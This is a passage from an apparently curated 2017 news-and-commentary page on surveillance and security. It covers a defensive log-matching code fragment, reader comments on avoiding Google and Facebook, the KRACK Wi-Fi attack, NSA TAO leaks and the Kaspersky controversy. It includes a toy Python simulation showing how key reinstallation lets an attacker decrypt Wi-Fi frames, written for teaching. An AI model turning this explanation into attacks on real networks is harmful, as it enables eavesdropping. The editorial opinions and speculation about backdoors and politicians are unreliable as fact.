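    for client, url, kind in match_proxy_log(SAMPLE_PROXY_LOG, IOCS):
        print(f"{client} fetched {defang(url)} ({kind} match)")
```

Note the order of the checks: the exact URL is tested first so the dropper fetch is labelled as such, and the host fallback catches follow-up requests to the same server. Printing results through defang() keeps the indicator unclickable when the output ends up in a ticket or e-mail.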

[Nov 01, 2017] Don't feed the beast. Duckduckgo is a good alternative to Google. And Facebook and Twitter's revenues are advertisement based

Abandoning Amazon is unrealistic, but controlling what you buy (given that all purchases go into your dossier) is probably a necessary precaution.
Google as a search engine has deteriorated (any search engine whose revenue comes from advertising ends up promoting spyware, and Google is especially bad in this respect because of its dominant position: those guys pay Google and push themselves to the top of the search results), and the alternatives are not much worse, if not better. It might make sense to change engines periodically rather than stick to a single one.
Facebook is an intelligence-collection company that masquerades as a social site, so anybody who uses Facebook is making the creation of a comprehensive dossier on him/her much easier. Your contacts are especially important. The same is true for Gmail and Hotmail.
Notable quotes:
"... From the beginning of Zuckerberg's empire, I thought Facebook was an idiotic excuse to get people involved in trivia, even the name turned me off. ..."
Nov 01, 2017 | consortiumnews.com

geeyp, November 1, 2017 at 7:18 am

I would like to posit that we stop with the Googling on the internet. I have never "Googled" ever. Oh sure, Google is involved with connecting you when you might click on some links. That you seemingly can't avoid. I also don't Face or Twitter. If everyone could avoid doing that now, perhaps we could show our disdain with these entities acquiescing to Feinstein, et al. I am so fed up with the Clinton crime family getting away with almost as much as the George H.W. crime family.

Skip Scott , November 1, 2017 at 8:46 am

geeyp-

That is a very good suggestion. Don't feed the beast. Duckduckgo is a good alternative to google. And facebook and twitter's revenues are ad based, so don't go there either, as they have been shown to be caving to TPTB. Amazon is also one to avoid for Bezos' links to the CIA.

Jessica K , November 1, 2017 at 9:55 am

From the beginning of Zuckerberg's empire, I thought Facebook was an idiotic excuse to get people involved in trivia, even the name turned me off.

Now, Twitter is planning to extend tweets to 280 characters, as if 140 is not bad enough. Unfortunately, Twitter can work to tell lies as well as push back on lies, same for Facebook and Google.

Seriously, this society has become unglued and as Lois says, "It ain't a pretty sight". Bad choices are leading to the American empire's downfall.

There's an interesting article from a week ago on Zero Hedge, "China's Rise, America's Fall", about China's launch of the petroyuan and other countries' desire to get off of dollar dominance.

Has a graph showing empire dominance from Portugal in 15th century, then Netherlands followed by Spain, then France, Great Britain, and finally the American empire, poised to be replaced by China.

[Oct 16, 2017] Yes, Your Wi-Fi Router Is Easily Hacked No, You Should Not Panic

Wi-Fi is limited to the local area, so the attacker needs a device within reception range of your Wi-Fi router (or of the client being attacked). That is trivial with public Wi-Fi, which is very exposed to this attack; home Wi-Fi routers are less exposed, although, as the article notes, someone parked outside or in the next apartment is close enough. Since KRACK only strips the link-layer encryption, traffic that is itself protected by TLS or a VPN stays protected; the real fix is patching clients (and access points), not changing the Wi-Fi password.
Notable quotes:
"... During the third step in the process, hackers can resend a key in such a way that it resets the encryption key to zero. Encryption is the process that makes your data uncrackable to anyone who might intercept it. ..."
"... With an unencrypted session, hackers are then free to pry on whatever you and your devices are doing on Wi-Fi. ..."
"... "The one saving grace is the attackers need to be within range of Wi-Fi networks," said Rudis. "But someone can sit outside your office or the apartment next door and do this attack from there." ..."
"... It's difficult to determine if any cyber criminals have used the exploit "in the wild" or are currently using it, the researchers said on their website. A demo video showed how they were able to use the attack to hack into an Android 6.0 smartphone. ..."
"... "This vulnerability has been in existence, some say, for up to 14 years -- which means that it's entirely possible someone has already determined this flaw in the past and has exploited it," he said. ..."
Oct 16, 2017 | www.msn.com

Thanks to a newly discovered security flaw, your home Wi-Fi is completely hackable, giving cyber thieves a front row seat to everything from your private chats to your baby monitor. And there's not much you can do about it -- yet.

"When I woke up this morning and saw this one, I was taken aback," Bob Rudis, chief data scientist at Rapid7, a security data and analytics company, told NBC News. "We try to make sure if something is talked about in a bad way, it actually is bad."

Called Krack, the attack takes advantage of the four-way handshake, a process between a device and a router that has been around for 14 years and is designed to deliver a fresh, encrypted session each time you get online.

During the third step in the process, hackers can resend a key in such a way that it resets the encryption key to zero. Encryption is the process that makes your data uncrackable to anyone who might intercept it.

With an unencrypted session, hackers are then free to pry on whatever you and your devices are doing on Wi-Fi.

"The one saving grace is the attackers need to be within range of Wi-Fi networks," said Rudis. "But someone can sit outside your office or the apartment next door and do this attack from there."

The Krack attack was discovered by researchers Mathy Vanhoef and Frank Piessens of KU Leuven in Belgium and was revealed on Monday.

It's a common practice in the security world to notify vendors of an exploit before it is publicly released. On their website, the researchers said they notified vendors of the products they tested on July 14. After realizing they were dealing with a protocol weakness instead of a set of bugs, the duo alerted the United States Computer Emergency Readiness Team (CERT), who began contacting vendors in August.

CERT disclosed the exploit on Monday and included a list of vendors , when they were notified, and whether they are affected. As of Monday afternoon, many were listed as "unknown."

It's difficult to determine if any cyber criminals have used the exploit "in the wild" or are currently using it, the researchers said on their website. A demo video showed how they were able to use the attack to hack into an Android 6.0 smartphone.

Google, which develops the Android operating system, is aware of the issue and "will be patching any affected devices in the coming weeks," a spokesperson said. Robert Siciliano, CEO of IDTheftSecurity.com, told NBC News "it's hard, if not impossible to say" if this attack has ever been used. However, given the amount of time the four-way handshake has been around, he believes it's possible someone has used it.

"This vulnerability has been in existence, some say, for up to 14 years -- which means that it's entirely possible someone has already determined this flaw in the past and has exploited it," he said.

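What makes the message-3 replay so damaging is keystream reuse: CCMP encrypts each frame with AES in counter mode keyed by the session key and a packet number that serves as the nonce, and reinstalling the key resets that packet number to zero. The following Python is an added illustration written for this page, not the researchers' code and not a real 802.11 implementation: it stands in a hash-based keystream for AES-CTR, models a client that reinstalls the key whenever message 3 arrives, and shows the two ways an attacker then reads traffic. In the general case two frames encrypted under the same (key, packet number) XOR to the XOR of their plaintexts, so one known frame exposes the other; on wpa_supplicant 2.4/2.5 (the Android 6.0 case in the demo video) the reinstalled key is all zeros and no known plaintext is needed at all. The session key and the two frames are constructed.

```python
import hashlib


def keystream(key: bytes, packet_number: int, length: int) -> bytes:
    """Toy stand-in for the CCMP/AES-CTR keystream, which real CCMP derives from
    the pairwise key and the 48-bit packet number (the nonce).  SHA-256 replaces
    AES only so the example runs on the standard library; the property that
    matters is identical: same key + same packet number => same keystream."""
    out = b""
    block = 0
    while len(out) < length:
        out += hashlib.sha256(
            key + packet_number.to_bytes(6, "big") + block.to_bytes(4, "big")
        ).digest()
        block += 1
    return out[:length]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


class Station:
    """A Wi-Fi client: holds the pairwise key and the transmit packet number."""

    def __init__(self, key_len=16):
        self.ptk = None
        self.pn = 0
        self.key_len = key_len

    def on_message3(self, ptk, clears_key_after_install=False):
        """Handler for message 3 of the 4-way handshake.  The standard says:
        install the key and reset the packet number.  KRACK replays message 3,
        so this runs twice and the packet number starts from zero again."""
        if clears_key_after_install and self.ptk is not None:
            # wpa_supplicant 2.4/2.5 (Android 6.0, some Linux): the key was
            # zeroed after the first install, so the replay installs all zeros.
            ptk = bytes(self.key_len)
        self.ptk = ptk
        self.pn = 0

    def send(self, plaintext: bytes):
        self.pn += 1
        return self.pn, xor(plaintext, keystream(self.ptk, self.pn, len(plaintext)))


def recover_with_known_plaintext(c1, p1, c2):
    """Two frames under the same (key, PN): c1 ^ c2 == p1 ^ p2, so knowing p1
    yields p2 (up to the length of p1)."""
    return xor(xor(c1, c2), p1)


# Constructed frames of equal length: a predictable first request, then one
# carrying a secret.  Equal lengths keep the XOR recovery total.
P1 = b"GET /login HTTP/1.1\r\nHost: bank"
P2 = b"password=hunter2&user=alice\r\n\r\n"
PTK = hashlib.sha256(b"constructed session key").digest()[:16]


def krack(zero_key_bug=False):
    """Replay message 3 between two frames and decrypt the second one."""
    sta = Station()
    sta.on_message3(PTK)                                         # genuine message 3
    pn1, c1 = sta.send(P1)
    sta.on_message3(PTK, clears_key_after_install=zero_key_bug)  # attacker's replay
    pn2, c2 = sta.send(P2)
    if zero_key_bug:
        # No known plaintext needed: the key is now all zeros.
        recovered = xor(c2, keystream(bytes(16), pn2, len(c2)))
    else:
        recovered = recover_with_known_plaintext(c1, P1, c2)
    return {"nonce_reused": pn1 == pn2, "recovered": recovered, "target": P2}


def control():
    """Same two frames without the replay: packet numbers differ, the XOR trick fails."""
    sta = Station()
    sta.on_message3(PTK)
    pn1, c1 = sta.send(P1)
    pn2, c2 = sta.send(P2)
    return {"nonce_reused": pn1 == pn2,
            "recovered": recover_with_known_plaintext(c1, P1, c2), "target": P2}


if __name__ == "__main__":
    r = krack()
    print("nonce reused:", r["nonce_reused"], "| recovered:", r["recovered"])
    print("zero-key variant recovers:", krack(zero_key_bug=True)["recovered"] == P2)
    print("control (no replay) recovers:", control()["recovered"] == P2)
```

The fix that shipped in clients is the obvious one in on_message3: only install the key the first time, and on a retransmitted message 3 just acknowledge without resetting the packet number. That is also why the attack is client-side and why changing the Wi-Fi password does nothing: the pairwise key here is fresh per session; it is its reuse with a repeated nonce, not its secrecy, that fails.
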
[Oct 11, 2017] Elite Hackers Stealing NSA Secrets Is 'Child's Play'

What a great waste of taxpayers' dollars. After Stuxnet, any government that cares about secrecy does not use open, internet-connected networks for sensitive information. Some switched to typewriters, at least for highly sensitive operations, which is probably overkill; but good old DOS can still be used to avoid NSA spooks pretty much like a typewriter, communication via the parallel port is not that easy to hack, and UUCP is still available for serial-port communication ;-)
But the effect of undermining US software and hardware sales is overwhelming. Why would anybody in a foreign government buy US hardware or software when it is clear that the NSA can put a backdoor into both "before arrival"? In this sense the game is over, and the net beneficiaries might be Taiwanese and other East Asian firms, as China is suspect too.
To say nothing of the effects on US consumers and businesses when those tools are incorporated by criminal hacking groups into commercial malware (as happened with the Shadow Brokers dumps and WannaCry). This is the real danger of NSA activities: the boomerang tends to return. And the security culture in most US companies (including government security contractors) is simply rudimentary or non-existent; in no way can they withstand an attack with NSA-grade tools. The sordid tale of Hillary's shadow IT and "bathroom server" is actually not an exception: creation of "shadow IT" is pretty common in the fossilized and over-bureaucratized US enterprise IT world.
Moreover, operations that "violate the sovereignty of other nations, like digging into China's networks, developing the tools British spies used to break into Belgium's largest telecom, and hacking sections of the Mexican government" are clearly criminal, and are possible only because of the status of the USA as the sole superpower. But they can result in, say, shipments of arms to anti-USA factions as state-to-state retaliation. Moreover, "there is no honor among thieves", and it should be assumed that the spread of this information is always wider than intended.
Like drone strikes, they inflame anti-Americanism and have constrained U.S. foreign policy options in ways that civilian and military planners neither imagined nor anticipated.
Oct 11, 2017 | www.msn.com

The NSA's hackers have a problem.

Last week, multiple outlets reported that the NSA's elite Tailored Access Operations unit -- tasked with breaking into foreign networks -- suffered another serious data breach. The theft of computer code and other material by an employee in 2015 allowed the Russian government to more easily detect U.S. cyber operations, according to the Washington Post. It's potentially the fourth large scale incident at the NSA to be revealed in the last five years.

Now, multiple sources with direct knowledge of TAO's security procedures in the recent past tell The Daily Beast just how porous some of the defenses were to keep workers from stealing sensitive information -- either digitally or by simply walking out of the front door with it.

One source described removing data from a TAO facility as "child's play." The Daily Beast granted the sources anonymity to talk candidly about the NSA's security practices.

TAO is not your average band of hackers. Its operations have included digging into China's networks , developing the tools British spies used to break into Belgium's largest telecom, and hacking sections of the Mexican government . While other parts of the NSA may focus on tapping undersea cables or prying data from Silicon Valley giants, TAO is the tip of the NSA's offensive hacking spear, and could have access to much more sensitive information ripped from adversaries' closed networks. The unit deploys and creates sophisticated exploits that rely on vulnerabilities in routers, operating systems, and computer hardware the general population uses -- the sort of tools that could wreak havoc if they fell into the wrong hands.

That doesn't mean those tools are locked down, though. "TAO specifically had a huge amount of latitude to move data between networks," the first source, who worked at the unit after Edward Snowden's mega-leak, said. The former employee said TAO limited the number of USB drives -- which could be used to steal data -- after that 2013 breach, but he still had used several while working at TAO.

"Most operators knew how they could get anything they wanted out of the classified nets and onto the internet if they wanted to, even without the USB drives," the former TAO employee said.

A second source, who also worked at TAO, told The Daily Beast, "most of the security was your co-workers checking to see that you had your badge on you at all times."

The NSA -- and recently TAO in particular -- have suffered a series of catastrophic data breaches. On top of the Snowden incident and this newly-scrutinized 2015 breach, NSA contractor Hal Martin allegedly hoarded a trove of computer code and documents from the NSA and other agencies in the U.S. Intelligence Community. Martin worked with TAO, and he ended up storing the material in his car and residence, according to prosecutors. Like Snowden, Martin was a contractor and not an employee of the NSA, as was Reality Winner, who allegedly leaked a top-secret report about Russian interference in the U.S. election to news site The Intercept.

Then there's the incident now in the news. Israeli operatives broke into the systems of the Russian cybersecurity firm Kaspersky Lab, officials told The Washington Post. On those systems were samples of sophisticated NSA hacking tools; a TAO employee had brought them home and placed them on his home computer. That machine was running Kaspersky software, which allegedly sent the NSA tools back to Moscow.

It's not totally clear how the breach overlaps with any others, but in 2016, a group called The Shadow Brokers started publishing full NSA exploit and tool code. Various hackers went on to incorporate a number of the dumped exploits in their own campaigns, including some designed to break into computers and mine digital currency, as well as the WannaCry ransomware, which crippled tens of thousands of computers around the world. (A handful of other, smaller NSA-related disclosures, including a catalogue of TAO hacking gear from 2007 and 2008, as well as intelligence intercepts, were not attributed to the Snowden documents, and the public details around where that information came from are muddy.)

Although not a data breach per se, in 2015 Kaspersky publicly revealed details on the history and tools of the so-called Equation Group, which is widely believed to be part of the NSA. A third source, who worked directly with TAO, said the fallout from that exposure meant the hacking unit entered a "significant shutdown," and "ran on minimum ops for months."

Nevertheless, a report by the Defense Department's inspector general completed in 2016 found that the NSA's "Secure the Net" project -- which aimed to restrict access to its most sensitive data after the Snowden breach -- fell short of its stated aims. The NSA did introduce some improvements, but it didn't effectively reduce the number of user accounts with 'privileged' access, which provide more avenues into sensitive data than normal users, nor fully implement technology to oversee these accounts' activities, the report reads.

Physical security wasn't much better, at least at one TAO operator's facility. He told The Daily Beast that there were "no bag checks or anything" as employees and contractors left work for the day -- meaning, it was easy to smuggle things home. Metal detectors were present, including before Snowden, but "nobody cared what came out," the second source added. The third source, who visited TAO facilities, said bag checks were random and weak.

"If you have a thumb drive in your pocket, it's going to get out," they said.

Unsurprisingly, workers need to swipe keycards to access certain rooms. But, "in most cases, it's pretty easy to get into those rooms without swipe access if you just knock and say who you're trying to see," the third source added.

To be clear, The Daily Beast's sources described the state of security up to 2015 -- not today. Things may have improved since then. And, of course, the NSA and TAO do have an array of security protections in place. TAO operators are screened and people on campus are already going to have a high level clearance, some of the sources stressed. The part of the NSA network that TAO uses, and which contains the unit's tools, can only be accessed by those with a designated account, according to the source who worked with TAO. Two of the sources believed in the NSA's ability to track down where a file came from after a breach.

Indeed, the system TAO members use to download their hacking tools for operations has become more heavily audited over the years too, although the network did have a known security issue, in which users could make their own account and automatically gain access to additional information, the source who worked with TAO said.

"The NSA operates in one of the most complicated IT environments in the world," an NSA spokesperson told The Daily Beast in a statement. "Over the past several years, we have continued to build on internal security improvements while carrying out the mission to defend the nation and our allies."

"We do not rely on only one initiative. Instead, we have undertaken a comprehensive and layered set of defensive measures to further safeguard operations and advance best practices," the spokesperson added.

The problem of securing this data from the inside is not an easy one to solve. If the NSA was to lock down TAO systems more ferociously, that could hamper TAO's ability to effectively build tools and capabilities in the first place, and two of the sources emphasised that excessive searches would likely create a recruiting problem for the agency. "It's not prison," one of the former TAO employees said.

"The security is all predicated on you having a clearance and being trusted," the source who has worked with TAO said.

"The system is just not set up to protect against someone with a clearance who is determined to go rogue," they added.

[Oct 11, 2017] Spy Spin Fuels Anti-Kaspersky Campaign

Indiscriminate spying is a costly and not very efficient operation. The problem of drinking from a fire hose arises. So a lot of the money spent by the US, GB and other countries on installation of such software is wasted. If the user of such computers uses steganography, this does not even allow the targeted activities to be detected.
It is not that elimination of Kaspersky software from the US market (due to the current anti-Russia witch hunt) is a big loss. The efficiency of AV programs against new threats was always problematic. But this hysteria points to a larger problem: the threat from regular hackers to your data, especially financial data and access to financial sites. I would say that the person who does not use two separate computers for browsing and for his financial and other confidential operations and data is reckless indeed. Now anybody with important financial data can afford two laptops. A good used, enterprise class, Dell laptop is around $400.
In Windows each antivirus is simultaneously a backdoor. That's a given. So usage by US government agencies of foreign AV software was an oversight, and the US government is doing the right thing to prohibit such usage. Similarly it would be highly irresponsible for, say, the Russian government to use McAfee software on government computers. Even for large transnational companies there are some tricky problems about which AV software to use. And that was a problem already understood long ago, say in 1996.
For governments, any large AV company represents a tremendous asset for surveillance. The intelligence community probably also has a close understanding of signature updaters and their vulnerabilities, and probably has agents in each of the major AV companies. And for a government, AV signature updates are the best way to install malware on your computer, and much simpler than hijacking OS updates.
So it is only natural that AV companies are a primary target of intelligence agencies. I remember being very surprised that McAfee was bought by Intel. Now I know why ;-). In the past some mass-deployed AV company software (Symantec) as well as Google software (Google bar) were spyware even without intelligence agencies' interference. In a way they were pioneers of mass surveillance.
Linux is in no way a panacea. It is another monstrously complex OS with multiple backdoors, especially on the application level (Apache is one recent example). But it will be much less attacked by non-government hackers. This is true. Security via obscurity does work. Still, if you need security against exfiltration of your data, MS DOS and Windows 3.1 are also a useful option (any non-networked computer actually would work; you can exchange data via parallel port too, for example Total Commander has such an option).
Notable quotes:
"... The British spy agency regarded the Kaspersky software in particular as a hindrance to its hacking operations and sought a way to neutralize it. ..."
"... An NSA slide describing "Project CAMBERDADA" lists at least 23 antivirus and security firms that were in that spy agency's sights. They include the Finnish antivirus firm F-Secure, the Slovakian firm Eset, Avast software from the Czech Republic, and Bit-Defender from Romania. Notably missing from the list are the American anti-virus firms Symantec and McAfee as well as the UK-based firm Sophos ..."
"... That the NSA and the British GCHQ did not list U.S. and British made anti-virus products on their "to do" list lets one assume that these packages can already be controlled by them. ..."
"... The Kaspersky anti-virus software, which the NSA employee had installed, identified parts of these tools as malware and uploaded them for analysis to Kaspersky's central detection database. The Kaspersky software behaved exactly as it should. Any other anti-virus software behaves similarly if it detects a possibly new virus. ..."
"... The only person in the tale who did something illegal was the NSA employee. The case also demonstrates that the NSA continues to have a massive insider security problem. There is no hint in the story to any evidence for its core claim of "Russian hackers". ..."
"... Meanwhile it's a well reported established fact that American virus/antimalware corps have allowed the FBI and other agencies to compromise their software with silent signatures - as with Magic Lantern for example (and imagine how far it's gone since then) ..."
"... In the network security world there is this concept of a honeypot where you entice/allow the world to attack/invade your honeypot so you can study the tools they use and insure the trail back to them is useful. ..."
Oct 11, 2017 | www.moonofalabama.org
... ... ...

U.S. and British spies systematically target all anti-virus products and companies:

The British spy agency regarded the Kaspersky software in particular as a hindrance to its hacking operations and sought a way to neutralize it.
...
An NSA slide describing "Project CAMBERDADA" lists at least 23 antivirus and security firms that were in that spy agency's sights. They include the Finnish antivirus firm F-Secure, the Slovakian firm Eset, Avast software from the Czech Republic, and Bit-Defender from Romania. Notably missing from the list are the American anti-virus firms Symantec and McAfee as well as the UK-based firm Sophos

That the NSA and the British GCHQ did not list U.S. and British made anti-virus products on their "to do" list lets one assume that these packages can already be controlled by them.

In February 2015 Kaspersky announced that it found U.S. and UK government spying and sabotage software infecting computers in various foreign countries. Later that year the CIA and FBI tried to recruit Kaspersky employees but were warned off. In June 2015 Kaspersky Lab detected a breach in its own systems by an Israeli government malware. It published an extensive autopsy of the breach and the malware programs used in it.

That the U.S. government now attempts to damage Kaspersky is likely a sign that Kaspersky products continue to be a hard-target that the NSA and GCHQ find difficult to breach.

To justify the campaign against Kaspersky, which began in May, U.S. officials recently started to provide a series of cover stories. A diligent reading of these stories reveals inconsistencies and a lack of logic. On October 5 the Wall Street Journal reported: Russian Hackers Stole NSA Data on U.S. Cyber Defense:

Hackers working for the Russian government stole details of how the U.S. penetrates foreign computer networks and defends against cyberattacks after a National Security Agency contractor removed the highly classified material and put it on his home computer, according to multiple people with knowledge of the matter.

The hackers appear to have targeted the contractor after identifying the files through the contractor's use of a popular antivirus software made by Russia-based Kaspersky Lab, these people said.

A NSA employee copied code of top-secret NSA spy tools and put it on his private computer. ("It's just that he was trying to complete the mission, and he needed the tools to do it." said 'one person familiar with the case' to WaPo.)

The Kaspersky anti-virus software, which the NSA employee had installed, identified parts of these tools as malware and uploaded them for analysis to Kaspersky's central detection database. The Kaspersky software behaved exactly as it should. Any other anti-virus software behaves similarly if it detects a possibly new virus.

The "multiple people with knowledge of the matter" talking to the WSJ seem to allege that this was a "Russian hacker" breach of NSA code. But nothing was hacked. If the story is correct, the Kaspersky tool was legally installed and worked as it should. The only person in the tale who did something illegal was the NSA employee. The case also demonstrates that the NSA continues to have a massive insider security problem. There is no hint in the story of any evidence for its core claim of "Russian hackers".

... ... ...

Further down the WSJ story says:

The incident occurred in 2015 but wasn't discovered until spring of last year, said the people familiar with the matter.

The stolen material included details about how the NSA penetrates foreign computer networks, the computer code it uses for such spying and how it defends networks inside the U.S., these people said.

If the last sentence is true the employee must have had top access to multiple NSA programs.

A new story in the New York Times today builds on the WSJ tale above. It makes the claims therein even more suspicious. The headline - How Israel Caught Russian Hackers Scouring the World for U.S. Secrets:

It was a case of spies watching spies watching spies: Israeli intelligence officers looked on in real time as Russian government hackers searched computers around the world for the code names of American intelligence programs.

What gave the Russian hacking, detected more than two years ago, such global reach was its improvised search tool -- antivirus software made by a Russian company, Kaspersky Lab, ...

The Israeli officials who had hacked into Kaspersky's own network alerted the United States to the broad Russian intrusion, which has not been previously reported, leading to a decision just last month to order Kaspersky software removed from government computers.

The Russian operation, described by multiple people who have been briefed on the matter, is known to have stolen classified documents from a National Security Agency employee who had improperly stored them on his home computer.

The Washington Post version of the story is remarkably different. Unlike the NYT it does not claim any Russian government involvement in Kaspersky systems:

In 2015, Israeli government hackers saw something suspicious in the computers of a Moscow-based cybersecurity firm: hacking tools that could only have come from the National Security Agency.

Israel notified the NSA, where alarmed officials immediately began a hunt for the breach, according to people familiar with the matter, who said an investigation by the agency revealed that the tools were in the possession of the Russian government.

Israeli spies had found the hacking material on the network of Kaspersky Lab ...

While the NYT asserts that the Russian government had access to the Kaspersky systems, the Washington Post does not assert that at all.

The NYT claims that the Israelis alerted the NSA of Russian government knowledge of its tools while WaPo says that it was the NSA itself that found this out. That Israel alerts the NSA when it has its hands on a valuable source that reveals NSA tools is not believable. There is no love lost between Israeli and U.S. spy agencies. They spy on each other whenever they can with even deadly consequences.

The NYT story is based on "current and former government officials", not on the usual " U.S. officials". It might well be that Israeli spies are spinning the NYT tale.

We already knew that the Israeli government had in 2015 breached some Kaspersky systems. Kaspersky Lab itself alarmed the public about it and provided an extensive forensic report.

There are several important questions that the above quoted stories do not ask:

If the Israelis detected NSA malware in the hands of the Russian government "more than two years ago" (NYT), how come the NSA hole was only found in 2016 (WSJ)? Did the Israelis use their claimed knowledge for a year without alarming their "allies" at the NSA? Why?

And why would the detection of alleged Russian government intrusion into Kaspersky products lead to a ban of these products only in fall 2017?

If the story were true the NSA should have reacted immediately. All Kaspersky products should have been banned from U.S. government systems as soon as the problem was known. The NSA allowed the Russian government, for more than a year, to sniff through all systems of the more than two dozen American government agencies (including the military) which use the Kaspersky products? That does not make sense.

These recently provided stories stink. There is no evidence provided for the assertions therein. They make the false claim that the NSA employee's computer was "hacked". Their timelines make no sense. If not complete fantasies, they are likely to be heavily spun to achieve a specific goal: to justify the banning of Kaspersky products from U.S. markets.

I regard these stories as part of "blame Russia" campaign that is used by the military-industrial complex to justify new defense spending. They may also be useful in removing a good security product that the NSA failed to breach from the "western" markets.

Oilman2 | Oct 11, 2017 10:29:02 AM | 10

Computers are dirt cheap these days. My first Mac cost me $3000 and the first clone PC I built cost me $1500. Today, I can buy a super-duper-anti-pooper PC device for $500. Hell folks, that is cheaper than an Iphone...

Use one computer for your critical work that has no internet connection, or use an old PC that has no network card. The OS may be uncool by today's standards, but the dang business software has hardly changed - just gotten more bloated with features.

Have one computer for exposure to wild viruses and all that crap, and another